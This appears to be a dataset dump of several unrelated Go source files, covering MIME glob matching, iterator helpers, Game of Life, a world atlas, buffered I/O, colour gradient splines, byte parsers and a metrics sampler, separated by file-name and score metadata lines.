type pattern struct {
matchers []matcher
length int
}
type textPattern struct {
pattern
caseSensitive bool
mimeType, weight int
}
type suffixPattern struct {
pattern
caseSensitive bool
mimeType, weight int
}
type prefixPattern struct {
pattern
caseSensitive bool
mimeType, weight int
}
func (v value) len() int { return len(v) }
func (list) len() int { return 1 }
func (byteRange) len() int { return 1 }
func (any) len() int { return 1 }
func (p pattern) len() int { return p.length }
func (l list) matchByte(b byte) bool { return strings.IndexByte(string(l), b) >= 0 }
func (r byteRange) matchByte(b byte) bool { return r.min <= b && b <= r.max }
func (a any) matchByte(b byte) bool {
for _, m := range a {
if m.matchByte(b) {
return true
}
}
return false
}
func (v value) match(s string) bool {
return s == string(v)
}
func (l list) match(s string) bool {
return l.matchByte(s[0])
}
func (r byteRange) match(s string) bool {
return r.matchByte(s[0])
}
func (a any) match(s string) bool {
return a.matchByte(s[0])
}
func (p pattern) match(s string) bool {
for _, ml := range p.matchers {
if !ml.match(s[:ml.len()]) {
return false
}
s = s[ml.len():]
}
return true
}
func (t textPattern) match(s string) bool { return len(s) == t.len() && t.pattern.match(s) }
func (t suffixPattern) match(s string) bool {
return len(s) >= t.len() && t.pattern.match(s[len(s)-t.len():])
}
func (t prefixPattern) match(s string) bool { return len(s) >= t.len() && t.pattern.match(s[:t.len()]) }
func (t textPattern) isCaseSensitive() bool { return t.caseSensitive }
func (t suffixPattern) isCaseSensitive() bool { return t.caseSensitive }
func (t prefixPattern) isCaseSensitive() bool { return t.caseSensitive }
func (t textPattern) mediaType() simpleGlob { return simpleGlob{t.weight, t.mimeType} }
func (t suffixPattern) mediaType() simpleGlob { return simpleGlob{t.weight, t.mimeType} }
func (t prefixPattern) mediaType() simpleGlob { return simpleGlob{t.weight, t.mimeType} }
type simpleGlob struct {
weight, mimeType int
}
// MatchGlob determines the MIME type of the file using
// exclusively its filename.
func MatchGlob(filename string) MediaType {
return mediaTypes[matchGlob(filename)]
}
func matchGlob(filename string) int {
return matchGlobAll(filename)[0]
}
func matchGlobAll(filename string) []int {
var globResults []simpleGlob
lowerCase := strings.ToLower(filename)
if t, ok := textCS[filename]; ok {
globResults = append(globResults, t...)
}
if t, ok := text[lowerCase]; ok {
globResults = append(globResults, t...)
}
fnLen := len(filename)
for l := min(len(filename), globMaxLen); l > 0; l-- {
if t, ok := suffixesCS[filename[fnLen-l:]]; ok {
globResults = append(globResults, t...)
}
if t, ok := prefixesCS[filename[:l]]; ok {
globResults = append(globResults, t...)
}
if t, ok := suffixes[lowerCase[fnLen-l:]]; ok {
globResults = append(globResults, t...)
}
if t, ok := prefixes[lowerCase[:l]]; ok {
globResults = append(globResults, t...)
}
}
for _, g := range globs {
if (g.isCaseSensitive() || g.match(lowerCase)) && (!g.isCaseSensitive() || g.match(filename)) {
globResults = append(globResults, g.mediaType())
}
}
if globResults == nil {
return []int{unknownType}
}
sort.Slice(globResults, func(i, j int) bool { return globResults[i].weight > globResults[j].weight })
results := make([]int, len(globResults))
for i := range globResults {
results[i] = globResults[i].mimeType
}
return results
} | glob.go | 0.506591 | 0.431345 | glob.go | starcoder |
package iter
// Any represents any type.
type Any interface{}
type (
// UnaryPredicate checks if a value satisfy condition.
UnaryPredicate func(Any) bool
// EqComparer checks if first value equals to the second value.
EqComparer func(Any, Any) bool
// LessComparer checks if first value is less than the second value.
LessComparer func(Any, Any) bool
// ThreeWayComparer compares 2 values, returns 1 if first>second, 0 if
// first=second, -1 if first<second.
ThreeWayComparer func(Any, Any) int
// IteratorFunction apply some actions to a value.
IteratorFunction func(Any)
// UnaryOperation transforms a value to another.
UnaryOperation func(Any) Any
// BinaryOperation transforms 2 values to 1 value.
BinaryOperation func(Any, Any) Any
// Generator creates a value on each call.
Generator func() Any
)
func _eq(x, y Any) bool {
type ieq interface{ Eq(Any) bool }
if e, ok := x.(ieq); ok {
return e.Eq(y)
}
return x == y
}
func _ne(x, y Any) bool {
return !_eq(x, y)
}
func _less(x, y Any) bool {
type iless interface{ Less(Any) bool }
if c, ok := x.(iless); ok {
return c.Less(y)
}
return _cmp(x, y) < 0
}
func _cmp(x, y Any) int {
type icmp interface{ Cmp(Any) int }
if t, ok := x.(icmp); ok {
return t.Cmp(y)
}
return reflectCmp(x, y)
}
func _inc(x Any) Any {
type iinc interface{ Inc() Any }
if i, ok := x.(iinc); ok {
return i.Inc()
}
return reflectInc(x)
}
func _add(x, y Any) Any {
type iadd interface{ Add(Any) Any }
if a, ok := x.(iadd); ok {
return a.Add(y)
}
return reflectAdd(x, y)
}
func _sub(x, y Any) Any {
type isub interface{ Sub(Any) Any }
if s, ok := x.(isub); ok {
return s.Sub(y)
}
return reflectSub(x, y)
}
func _mul(x, y Any) Any {
type imul interface{ Mul(Any) Any }
if m, ok := x.(imul); ok {
return m.Mul(y)
}
return reflectMul(x, y)
}
// Returns a Predicate that returns true if the value equals v.
func _eq1(v Any) UnaryPredicate {
return func(x Any) bool {
return _eq(v, x)
}
}
func _not1(p UnaryPredicate) UnaryPredicate {
return func(x Any) bool { return !p(x) }
}
func _true1(Any) bool { return true }
func _noop(x Any) Any { return x } | funcs.go | 0.843089 | 0.481576 | funcs.go | starcoder |
package life
// Game of life. Constructor functions should be used to create instances.
type Game struct {
cells Cells
neighbors func(Point) []Point
}
// State of a cell
type State int
const (
// Dead indicates that a cell is dead
Dead State = iota
// Alive indicates that a cell is alive
Alive
)
// Cells represented by a map keyed by position and with a value of true if that position is a live cell
type Cells map[Point]State
// NewUnboundedGame creates an unbounded Game populated with the supplied live cells
func NewUnboundedGame(liveCellLocations []Point) *Game {
return &Game{
cells: newCells(liveCellLocations),
neighbors: unboundedNeighbors,
}
}
// NewBoundedGame creates a bounded Game populated with the supplied live cells. The game is a rectangular area with
// corners at the minimum and maximum points. No cells can live outside of the game area.
func NewBoundedGame(liveCellLocations []Point, min Point, max Point) *Game {
return &Game{
cells: newCells(liveCellLocations),
neighbors: boundedNeighbors(min, max),
}
}
func newCells(locations []Point) Cells {
cells := make(Cells, len(locations))
for _, location := range locations {
cells[location] = Alive
}
return cells
}
// Cells in the game
func (g *Game) Cells() Cells {
return g.cells
}
// Next iteration of the game
func (g *Game) Next() *Game {
nextCells := make(Cells)
g.forEachLiveCell(func(location Point) {
if g.isSurvivor(location) {
nextCells[location] = Alive
}
g.addNeighborBirths(nextCells, location)
})
return &Game{
cells: nextCells,
neighbors: g.neighbors,
}
}
func (g *Game) forEachLiveCell(fn func(Point)) {
for cell := range g.cells {
fn(cell)
}
}
func (g *Game) isSurvivor(location Point) bool {
liveNeighborCount := g.liveNeighborCount(location)
return liveNeighborCount == 2 || liveNeighborCount == 3
}
func (g *Game) liveNeighborCount(location Point) (count int) {
g.forEachNeighbor(location, func(neighbor Point) {
if g.cells[neighbor] == Alive {
count++
}
})
return count
}
func (g *Game) forEachNeighbor(location Point, fn func(Point)) {
for _, neighbor := range g.neighbors(location) {
fn(neighbor)
}
}
func (g *Game) addNeighborBirths(cells Cells, location Point) {
g.forEachNeighbor(location, func(neighbor Point) {
if cells[neighbor] != Alive && g.isBorn(neighbor) {
cells[neighbor] = Alive
}
})
}
func (g *Game) isBorn(location Point) bool {
return g.cells[location] == Dead && g.liveNeighborCount(location) == 3
}
func boundedNeighbors(min Point, max Point) func(Point) []Point {
return func(p Point) []Point {
possibleNeighbors := unboundedNeighbors(p)
neighbors := make([]Point, 0, len(possibleNeighbors))
for _, neighbor := range possibleNeighbors {
if !neighbor.LessThan(min) && !neighbor.GreaterThan(max) {
neighbors = append(neighbors, neighbor)
}
}
return neighbors
}
}
func unboundedNeighbors(p Point) []Point {
return []Point{
{p.X - 1, p.Y - 1},
{p.X - 1, p.Y},
{p.X - 1, p.Y + 1},
{p.X, p.Y - 1},
{p.X, p.Y + 1},
{p.X + 1, p.Y - 1},
{p.X + 1, p.Y},
{p.X + 1, p.Y + 1},
}
} | life/game.go | 0.826537 | 0.755389 | game.go | starcoder |
package rove
import (
"log"
"github.com/mdiluz/rove/pkg/maths"
"github.com/mdiluz/rove/proto/roveapi"
)
// chunk represents a fixed square grid of tiles
type chunk struct {
// Tiles represents the tiles within the chunk
Tiles []byte
// Objects represents the objects within the chunk
// only one possible object per tile for now
Objects map[int]Object
}
// chunkBasedAtlas represents a grid of Chunks
type chunkBasedAtlas struct {
// Chunks represents all chunks in the world
// This is intentionally not a 2D array so it can be expanded in all directions
Chunks []chunk
// LowerBound is the origin of the bottom left corner of the current chunks in world space (current chunks cover >= this value)
LowerBound maths.Vector
// UpperBound is the top left corner of the current chunks (curent chunks cover < this value)
UpperBound maths.Vector
// ChunkSize is the x/y dimensions of each square chunk
ChunkSize int
// worldGen is the internal world generator
worldGen WorldGen
}
const (
noiseSeed = 1024
)
// NewChunkAtlas creates a new empty atlas
func NewChunkAtlas(chunkSize int) Atlas {
// Start up with one chunk
a := chunkBasedAtlas{
ChunkSize: chunkSize,
Chunks: make([]chunk, 1),
LowerBound: maths.Vector{X: 0, Y: 0},
UpperBound: maths.Vector{X: chunkSize, Y: chunkSize},
worldGen: NewNoiseWorldGen(noiseSeed),
}
// Initialise the first chunk
a.populate(0)
return &a
}
// SetTile sets an individual tile's kind
func (a *chunkBasedAtlas) SetTile(v maths.Vector, tile roveapi.Tile) {
c := a.worldSpaceToChunkWithGrow(v)
local := a.worldSpaceToChunkLocal(v)
a.setTile(c, local, byte(tile))
}
// SetObject sets the object on a tile
func (a *chunkBasedAtlas) SetObject(v maths.Vector, obj Object) {
c := a.worldSpaceToChunkWithGrow(v)
local := a.worldSpaceToChunkLocal(v)
a.setObject(c, local, obj)
}
// QueryPosition will return information for a specific position
func (a *chunkBasedAtlas) QueryPosition(v maths.Vector) (roveapi.Tile, Object) {
c := a.worldSpaceToChunkWithGrow(v)
local := a.worldSpaceToChunkLocal(v)
a.populate(c)
chunk := a.Chunks[c]
i := a.chunkTileIndex(local)
return roveapi.Tile(chunk.Tiles[i]), chunk.Objects[i]
}
// chunkTileID returns the tile index within a chunk
func (a *chunkBasedAtlas) chunkTileIndex(local maths.Vector) int {
return local.X + local.Y*a.ChunkSize
}
// populate will fill a chunk with data
func (a *chunkBasedAtlas) populate(chunk int) {
c := a.Chunks[chunk]
if c.Tiles != nil {
return
}
c.Tiles = make([]byte, a.ChunkSize*a.ChunkSize)
c.Objects = make(map[int]Object)
origin := a.chunkOriginInWorldSpace(chunk)
for i := 0; i < a.ChunkSize; i++ {
for j := 0; j < a.ChunkSize; j++ {
loc := maths.Vector{X: origin.X + i, Y: origin.Y + j}
// Set the tile
c.Tiles[j*a.ChunkSize+i] = byte(a.worldGen.GetTile(loc))
// Set the object
obj := a.worldGen.GetObject(loc)
if obj.Type != roveapi.Object_ObjectUnknown {
c.Objects[j*a.ChunkSize+i] = obj
}
}
}
a.Chunks[chunk] = c
}
// setTile sets a tile in a specific chunk
func (a *chunkBasedAtlas) setTile(chunk int, local maths.Vector, tile byte) {
a.populate(chunk)
c := a.Chunks[chunk]
c.Tiles[a.chunkTileIndex(local)] = tile
a.Chunks[chunk] = c
}
// setObject sets an object in a specific chunk
func (a *chunkBasedAtlas) setObject(chunk int, local maths.Vector, object Object) {
a.populate(chunk)
c := a.Chunks[chunk]
i := a.chunkTileIndex(local)
if object.Type != roveapi.Object_ObjectUnknown {
c.Objects[i] = object
} else {
delete(c.Objects, i)
}
a.Chunks[chunk] = c
}
// worldSpaceToChunkLocal gets a chunk local coordinate for a tile
func (a *chunkBasedAtlas) worldSpaceToChunkLocal(v maths.Vector) maths.Vector {
return maths.Vector{X: maths.Pmod(v.X, a.ChunkSize), Y: maths.Pmod(v.Y, a.ChunkSize)}
}
// worldSpaceToChunkID gets the current chunk ID for a position in the world
func (a *chunkBasedAtlas) worldSpaceToChunkIndex(v maths.Vector) int {
// Shift the vector by our current min
v = v.Added(a.LowerBound.Negated())
// Divide by the current size and floor, to get chunk-scaled vector from the lower bound
v = v.DividedFloor(a.ChunkSize)
// Calculate the width
width := a.UpperBound.X - a.LowerBound.X
widthInChunks := width / a.ChunkSize
// Along the corridor and up the stairs
return (v.Y * widthInChunks) + v.X
}
// chunkOriginInWorldSpace returns the origin of the chunk in world space
func (a *chunkBasedAtlas) chunkOriginInWorldSpace(chunk int) maths.Vector {
// Calculate the width
width := a.UpperBound.X - a.LowerBound.X
widthInChunks := width / a.ChunkSize
// Reverse the along the corridor and up the stairs
v := maths.Vector{
X: chunk % widthInChunks,
Y: chunk / widthInChunks,
}
// Multiply up to world scale
v = v.Multiplied(a.ChunkSize)
// Shift by the lower bound
return v.Added(a.LowerBound)
}
// getNewBounds gets new lower and upper bounds for the world space given a vector
func (a *chunkBasedAtlas) getNewBounds(v maths.Vector) (lower maths.Vector, upper maths.Vector) {
lower = maths.Min2(v, a.LowerBound)
upper = maths.Max2(v.Added(maths.Vector{X: 1, Y: 1}), a.UpperBound)
lower = maths.Vector{
X: maths.RoundDown(lower.X, a.ChunkSize),
Y: maths.RoundDown(lower.Y, a.ChunkSize),
}
upper = maths.Vector{
X: maths.RoundUp(upper.X, a.ChunkSize),
Y: maths.RoundUp(upper.Y, a.ChunkSize),
}
return
}
// worldSpaceToTrunkWithGrow will expand the current atlas for a given world space position if needed
func (a *chunkBasedAtlas) worldSpaceToChunkWithGrow(v maths.Vector) int {
// If we're within bounds, just return the current chunk
if v.X >= a.LowerBound.X && v.Y >= a.LowerBound.Y && v.X < a.UpperBound.X && v.Y < a.UpperBound.Y {
return a.worldSpaceToChunkIndex(v)
}
// Calculate the new bounds
lower, upper := a.getNewBounds(v)
size := upper.Added(lower.Negated())
size = size.Divided(a.ChunkSize)
// Create the new empty atlas
newAtlas := chunkBasedAtlas{
ChunkSize: a.ChunkSize,
LowerBound: lower,
UpperBound: upper,
Chunks: make([]chunk, size.X*size.Y),
worldGen: a.worldGen,
}
// Log that we're resizing
log.Printf("Re-allocating world, old: %+v,%+v new: %+v,%+v\n", a.LowerBound, a.UpperBound, newAtlas.LowerBound, newAtlas.UpperBound)
// Copy all old chunks into the new atlas
for chunk, chunkData := range a.Chunks {
// Calculate the chunk ID in the new atlas
origin := a.chunkOriginInWorldSpace(chunk)
newChunk := newAtlas.worldSpaceToChunkIndex(origin)
// Copy over the old chunk to the new atlas
newAtlas.Chunks[newChunk] = chunkData
}
// Overwrite the old atlas with this one
*a = newAtlas
return a.worldSpaceToChunkIndex(v)
} | pkg/rove/chunkAtlas.go | 0.794704 | 0.695884 | chunkAtlas.go | starcoder |
package bufio
import (
"bufio"
"bytes"
"io"
)
const defaultBufferSize = 1024
// Reader implements buffering for an io.Reader object.
type Reader struct {
err error
buf []byte
rd io.Reader
rpos int
wpos int
slice SliceAlloc
}
// NewReader returns a new Reader whose buffer has the default size.
func NewReader(rd io.Reader) *Reader {
return NewReaderSize(rd, defaultBufferSize)
}
// NewReaderSize returns a new Reader whose buffer has at least the specified
// size. If the argument io.Reader is already a Reader with large enough
// size, it returns the underlying Reader.
func NewReaderSize(rd io.Reader, size int) *Reader {
if size <= 0 {
size = defaultBufferSize
}
return &Reader{rd: rd, buf: make([]byte, size)}
}
func (b *Reader) fill() error {
if b.err != nil {
return b.err
}
if b.rpos > 0 {
n := copy(b.buf, b.buf[b.rpos:b.wpos])
b.rpos = 0
b.wpos = n
}
n, err := b.rd.Read(b.buf[b.wpos:])
if err != nil {
b.err = err
} else if n == 0 {
b.err = io.ErrNoProgress
} else {
b.wpos += n
}
return b.err
}
func (b *Reader) buffered() int {
return b.wpos - b.rpos
}
// Read reads data into p.
// It returns the number of bytes read into p.
// The bytes are taken from at most one Read on the underlying Reader,
// hence n may be less than len(p).
// At EOF, the count will be zero and err will be io.EOF.
func (b *Reader) Read(p []byte) (int, error) {
if b.err != nil || len(p) == 0 {
return 0, b.err
}
if b.buffered() == 0 {
if len(p) >= len(b.buf) {
n, err := b.rd.Read(p)
if err != nil {
b.err = err
}
return n, b.err
}
if b.fill() != nil {
return 0, b.err
}
}
n := copy(p, b.buf[b.rpos:b.wpos])
b.rpos += n
return n, nil
}
// ReadByte reads and returns a single byte.
// If no byte is available, returns an error.
func (b *Reader) ReadByte() (byte, error) {
if b.err != nil {
return 0, b.err
}
if b.buffered() == 0 {
if b.fill() != nil {
return 0, b.err
}
}
c := b.buf[b.rpos]
b.rpos++
return c, nil
}
// ReadSlice reads until the first occurrence of delim in the input,
// returning a slice pointing at the bytes in the buffer.
// The bytes stop being valid at the next read.
// If ReadSlice encounters an error before finding a delimiter,
// it returns all the data in the buffer and the error itself (often io.EOF).
// ReadSlice fails with error ErrBufferFull if the buffer fills without a delim.
// Because the data returned from ReadSlice will be overwritten
// by the next I/O operation, most clients should use ReadBytes instead.
// ReadSlice returns err != nil if and only if line does not end in delim.
func (b *Reader) ReadSlice(delim byte) ([]byte, error) {
if b.err != nil {
return nil, b.err
}
for {
var index = bytes.IndexByte(b.buf[b.rpos:b.wpos], delim)
if index >= 0 {
limit := b.rpos + index + 1
slice := b.buf[b.rpos:limit]
b.rpos = limit
return slice, nil
}
if b.buffered() == len(b.buf) {
b.rpos = b.wpos
return b.buf, bufio.ErrBufferFull
}
if b.fill() != nil {
return nil, b.err
}
}
}
// ReadBytes reads until the first occurrence of delim in the input,
// returning a slice containing the data up to and including the delimiter.
// If ReadBytes encounters an error before finding a delimiter,
// it returns the data read before the error and the error itself (often io.EOF).
// ReadBytes returns err != nil if and only if the returned data does not end in
// delim.
// For simple uses, a Scanner may be more convenient.
func (b *Reader) ReadBytes(delim byte) ([]byte, error) {
var full [][]byte
var last []byte
var size int
for last == nil {
f, err := b.ReadSlice(delim)
if err != nil {
if err != bufio.ErrBufferFull {
return nil, b.err
}
dup := b.slice.Make(len(f))
copy(dup, f)
full = append(full, dup)
} else {
last = f
}
size += len(f)
}
var n int
var buf = b.slice.Make(size)
for _, frag := range full {
n += copy(buf[n:], frag)
}
copy(buf[n:], last)
return buf, nil
}
// ReadFull reads exactly n bytes from r into buf.
// It returns the number of bytes copied and an error if fewer bytes were read.
// The error is EOF only if no bytes were read.
// If an EOF happens after reading some but not all the bytes,
// ReadFull returns ErrUnexpectedEOF.
// On return, n == len(buf) if and only if err == nil.
func (b *Reader) ReadFull(n int) ([]byte, error) {
if b.err != nil || n == 0 {
return nil, b.err
}
var buf = b.slice.Make(n)
if _, err := io.ReadFull(b, buf); err != nil {
return nil, err
}
return buf, nil
}
// Writer implements buffering for an io.Writer object.
// If an error occurs writing to a Writer, no more data will be
// accepted and all subsequent writes, and Flush, will return the error.
// After all data has been written, the client should call the
// Flush method to guarantee all data has been forwarded to
// the underlying io.Writer.
type Writer struct {
err error
buf []byte
wr io.Writer
wpos int
}
// NewWriter returns a new Writer whose buffer has the default size.
func NewWriter(wr io.Writer) *Writer {
return NewWriterSize(wr, defaultBufferSize)
}
// NewWriterSize returns a new Writer whose buffer has at least the specified
// size. If the argument io.Writer is already a Writer with large enough
// size, it returns the underlying Writer.
func NewWriterSize(wr io.Writer, size int) *Writer {
if size <= 0 {
size = defaultBufferSize
}
return &Writer{wr: wr, buf: make([]byte, size)}
}
// Flush writes any buffered data to the underlying io.Writer.
func (b *Writer) Flush() error {
return b.flush()
}
func (b *Writer) flush() error {
if b.err != nil {
return b.err
}
if b.wpos == 0 {
return nil
}
n, err := b.wr.Write(b.buf[:b.wpos])
if err != nil {
b.err = err
} else if n < b.wpos {
b.err = io.ErrShortWrite
} else {
b.wpos = 0
}
return b.err
}
func (b *Writer) available() int {
return len(b.buf) - b.wpos
}
// Write writes the contents of p into the buffer.
// It returns the number of bytes written.
// If nn < len(p), it also returns an error explaining
// why the write is short.
func (b *Writer) Write(p []byte) (nn int, err error) {
for b.err == nil && len(p) > b.available() {
var n int
if b.wpos == 0 {
n, b.err = b.wr.Write(p)
} else {
n = copy(b.buf[b.wpos:], p)
b.wpos += n
b.flush()
}
nn, p = nn+n, p[n:]
}
if b.err != nil || len(p) == 0 {
return nn, b.err
}
n := copy(b.buf[b.wpos:], p)
b.wpos += n
return nn + n, nil
}
// WriteByte writes a single byte.
func (b *Writer) WriteByte(c byte) error {
if b.err != nil {
return b.err
}
if b.available() == 0 && b.flush() != nil {
return b.err
}
b.buf[b.wpos] = c
b.wpos++
return nil
}
// WriteString writes a string.
// It returns the number of bytes written.
// If the count is less than len(s), it also returns an error explaining
// why the write is short.
func (b *Writer) WriteString(s string) (nn int, err error) {
for b.err == nil && len(s) > b.available() {
n := copy(b.buf[b.wpos:], s)
b.wpos += n
b.flush()
nn, s = nn+n, s[n:]
}
if b.err != nil || len(s) == 0 {
return nn, b.err
}
n := copy(b.buf[b.wpos:], s)
b.wpos += n
return nn + n, nil
} | lib/bufio/bufio.go | 0.670932 | 0.422088 | bufio.go | starcoder |
package colorgrad
import (
"math"
"github.com/lucasb-eyer/go-colorful"
"github.com/mazznoer/csscolorparser"
)
type interpolator interface {
at(float64) float64
}
// Adapted from https://qroph.github.io/2018/07/30/smooth-paths-using-catmull-rom-splines.html
type catmullRomInterpolator struct {
segments [][4]float64
pos []float64
}
func newCatmullRomInterpolator(values, pos []float64) catmullRomInterpolator {
alpha := 0.5
tension := 0.0
n := len(values)
vals := make([]float64, n+2)
vals[0] = 2*values[0] - values[1]
for i, v := range values {
vals[i+1] = v
}
vals[n+1] = 2*values[n-1] - values[n-2]
segments := [][4]float64{}
for i := 1; i < len(vals)-2; i++ {
v0 := vals[i-1]
v1 := vals[i]
v2 := vals[i+1]
v3 := vals[i+2]
t0 := 0.0
t1 := t0 + math.Pow(math.Abs(v0-v1), alpha)
t2 := t1 + math.Pow(math.Abs(v1-v2), alpha)
t3 := t2 + math.Pow(math.Abs(v2-v3), alpha)
m1 := (1. - tension) * (t2 - t1) * ((v0-v1)/(t0-t1) - (v0-v2)/(t0-t2) + (v1-v2)/(t1-t2))
m2 := (1. - tension) * (t2 - t1) * ((v1-v2)/(t1-t2) - (v1-v3)/(t1-t3) + (v2-v3)/(t2-t3))
if math.IsNaN(m1) {
m1 = 0
}
if math.IsNaN(m2) {
m2 = 0
}
a := 2*v1 - 2*v2 + m1 + m2
b := -3*v1 + 3*v2 - 2*m1 - m2
c := m1
d := v1
segments = append(segments, [4]float64{a, b, c, d})
}
return catmullRomInterpolator{
segments,
pos,
}
}
func (cr catmullRomInterpolator) at(t float64) float64 {
for i := 0; i < len(cr.segments); i++ {
p1 := cr.pos[i]
p2 := cr.pos[i+1]
if (p1 <= t) && (t <= p2) {
seg := cr.segments[i]
t1 := (t - p1) / (p2 - p1)
t2 := t1 * t1
t3 := t2 * t1
return seg[0]*t3 + seg[1]*t2 + seg[2]*t1 + seg[3]
}
}
return 0
}
// Adapted from https://github.com/d3/d3-interpolate/blob/master/src/basis.js
func basis(t1, v0, v1, v2, v3 float64) float64 {
t2 := t1 * t1
t3 := t2 * t1
return ((1-3*t1+3*t2-t3)*v0 + (4-6*t2+3*t3)*v1 + (1+3*t1+3*t2-3*t3)*v2 + t3*v3) / 6
}
type basisInterpolator struct {
values []float64
pos []float64
}
func newBasisInterpolator(values, pos []float64) basisInterpolator {
return basisInterpolator{
values, pos,
}
}
func (b basisInterpolator) at(t float64) float64 {
n := len(b.values) - 1
for i := 0; i < n; i++ {
p1 := b.pos[i]
p2 := b.pos[i+1]
if (p1 <= t) && (t <= p2) {
t := (t - p1) / (p2 - p1)
v1 := b.values[i]
v2 := b.values[i+1]
var v0, v3 float64
if i > 0 {
v0 = b.values[i-1]
} else {
v0 = 2*v1 - v2
}
if i < (n - 1) {
v3 = b.values[i+2]
} else {
v3 = 2*v2 - v1
}
return basis(t, v0, v1, v2, v3)
}
}
return 0
}
type splineGradient struct {
a interpolator
b interpolator
c interpolator
dmin float64
dmax float64
mode BlendMode
}
func (s splineGradient) At(t float64) colorful.Color {
if math.IsNaN(t) {
return colorful.Color{R: 0, G: 0, B: 0}
}
t = math.Max(s.dmin, math.Min(s.dmax, t))
switch s.mode {
case BlendLinearRgb:
return colorful.LinearRgb(s.a.at(t), s.b.at(t), s.c.at(t))
case BlendLab:
return colorful.Lab(s.a.at(t), s.b.at(t), s.c.at(t)).Clamped()
case BlendLuv:
return colorful.Luv(s.a.at(t), s.b.at(t), s.c.at(t)).Clamped()
case BlendHcl:
return colorful.Hcl(s.a.at(t), s.b.at(t), s.c.at(t)).Clamped()
case BlendHsv:
return colorful.Hsv(s.a.at(t), s.b.at(t), s.c.at(t))
case BlendOklab:
r, g, b := oklabToLrgb(s.a.at(t), s.b.at(t), s.c.at(t))
return colorful.LinearRgb(r, g, b).Clamped()
default:
return colorful.Color{R: s.a.at(t), G: s.b.at(t), B: s.c.at(t)}
}
}
func newSplineGradient(colors []colorful.Color, pos []float64, space BlendMode, interpolation Interpolation) Gradient {
n := len(colors)
a := make([]float64, n)
b := make([]float64, n)
c := make([]float64, n)
for i, col := range colors {
var c1, c2, c3 float64
switch space {
case BlendLinearRgb:
c1, c2, c3 = col.LinearRgb()
case BlendLab:
c1, c2, c3 = col.Lab()
case BlendLuv:
c1, c2, c3 = col.Luv()
case BlendHcl:
c1, c2, c3 = col.Hcl()
case BlendHsv:
c1, c2, c3 = col.Hsv()
case BlendOklab:
lr, lg, lb := col.LinearRgb()
c1, c2, c3 = lrgbToOklab(lr, lg, lb)
case BlendRgb:
c1, c2, c3 = col.R, col.G, col.B
}
a[i] = c1
b[i] = c2
c[i] = c3
}
dmin := pos[0]
dmax := pos[n-1]
var gradbase gradientBase
switch interpolation {
case InterpolationBasis:
gradbase = splineGradient{
a: newBasisInterpolator(a, pos),
b: newBasisInterpolator(b, pos),
c: newBasisInterpolator(c, pos),
dmin: dmin,
dmax: dmax,
mode: space,
}
case InterpolationCatmullRom:
gradbase = splineGradient{
a: newCatmullRomInterpolator(a, pos),
b: newCatmullRomInterpolator(b, pos),
c: newCatmullRomInterpolator(c, pos),
dmin: dmin,
dmax: dmax,
mode: space,
}
}
return Gradient{
grad: gradbase,
dmin: dmin,
dmax: dmax,
}
}
func presetSpline(htmlColors []string) Gradient {
var colors []colorful.Color
for _, s := range htmlColors {
c, err := csscolorparser.Parse(s)
if err == nil {
colors = append(colors, colorful.Color{R: c.R, G: c.G, B: c.B})
}
}
pos := linspace(0, 1, uint(len(colors)))
return newSplineGradient(colors, pos, BlendRgb, InterpolationBasis)
} | spline.go | 0.638497 | 0.468122 | spline.go | starcoder |
package pars
import (
"bytes"
"fmt"
"strings"
"github.com/go-ascii/ascii"
)
// Byte creates a Parser which will attempt to match the next single byte.
// If no bytes are given, it will match any byte.
// Otherwise, the given bytes will be tested for a match.
func Byte(p ...byte) Parser {
switch len(p) {
case 0:
return func(state *State, result *Result) error {
if err := state.Request(1); err != nil {
return NewNestedError("Byte", err)
}
result.SetToken([]byte{state.Buffer()[0]})
state.Advance()
return nil
}
case 1:
e := p[0]
rep := ascii.Rep(e)
name := fmt.Sprintf("Byte(%s)", rep)
what := fmt.Sprintf("expected `%s`", rep)
return func(state *State, result *Result) error {
c, err := Next(state)
if err != nil {
return NewNestedError(name, err)
}
if c != e {
return NewError(what, state.Position())
}
result.SetToken([]byte{c})
state.Advance()
return nil
}
default:
reps := strings.Join(ascii.Reps(p), ", ")
name := fmt.Sprintf("Byte(%s)", reps)
what := fmt.Sprintf("expected one of [%s]", reps)
s := string(p)
mismatch := func(c byte) bool { return strings.IndexByte(s, c) < 0 }
return func(state *State, result *Result) error {
c, err := Next(state)
if err != nil {
return NewNestedError(name, err)
}
if mismatch(c) {
return NewError(what, state.Position())
}
result.SetToken([]byte{c})
state.Advance()
return nil
}
}
}
// ByteRange creates a Parser which will attempt to match a byte between the
// given range inclusively.
func ByteRange(begin, end byte) Parser {
if begin < end {
rbegin, rend := ascii.Rep(begin), ascii.Rep(end)
name := fmt.Sprintf("ByteRange(%s, %s)", rbegin, rend)
what := fmt.Sprintf("expected in range %s-%s", rbegin, rend)
return func(state *State, result *Result) error {
c, err := Next(state)
if err != nil {
return NewNestedError(name, err)
}
if c < begin || end < c {
return NewError(what, state.Position())
}
result.SetToken([]byte{c})
state.Advance()
return nil
}
}
panic("invalid byte range")
}
// Bytes creates a Parser which will attempt to match the given sequence of bytes.
func Bytes(p []byte) Parser {
reps := fmt.Sprintf("[%s]", strings.Join(ascii.Reps(p), ", "))
name := fmt.Sprintf("Bytes([%s])", reps)
what := fmt.Sprintf("expected [%s]", reps)
return func(state *State, result *Result) error {
if err := state.Request(len(p)); err != nil {
return NewNestedError(name, err)
}
if !bytes.Equal(state.Buffer(), p) {
return NewError(what, state.Position())
}
result.SetToken(p)
state.Advance()
return nil
}
} | bytes.go | 0.679072 | 0.424591 | bytes.go | starcoder |
package stats
import (
"math/rand"
"sync"
"sync/atomic"
"time"
)
// Measurer represents a monitoring contract.
type Measurer interface {
Snapshotter
Measure(name string, value int32)
MeasureElapsed(name string, start time.Time)
MeasureRuntime()
Tag(name, tag string)
}
// Metric maintains a combination of a gauge and a statistically-significant selection
// of the values from a stream. This is essentially a combination of a histogram, gauge
// and a counter.
type Metric struct {
sync.Mutex
data sample // The sample used to build a histogram
count int32 // The number of samples observed
create int64 // The first updated time
name string // The name of the metric
tag string // The tag of the metric (e.g.: IP Address)
}
const (
reservoirSize = 1024
)
// NewMetric creates a new metric.
func NewMetric(name string) *Metric {
return &Metric{
name: name,
data: make([]int32, reservoirSize, reservoirSize),
create: time.Now().Unix(),
}
}
// Reset clears all samples and resets the metric.
func (m *Metric) Reset() {
m.Lock()
defer m.Unlock()
atomic.StoreInt32(&m.count, 0)
m.create = time.Now().Unix()
}
// Name returns the name of the histogram.
func (m *Metric) Name() string {
return m.name
}
// Tag returns the associated tag of the metric.
func (m *Metric) Tag() string {
m.Lock()
defer m.Unlock()
return m.tag
}
// Window returns start and end time of the histogram.
func (m *Metric) Window() (time.Time, time.Time) {
return time.Unix(m.create, 0), time.Now()
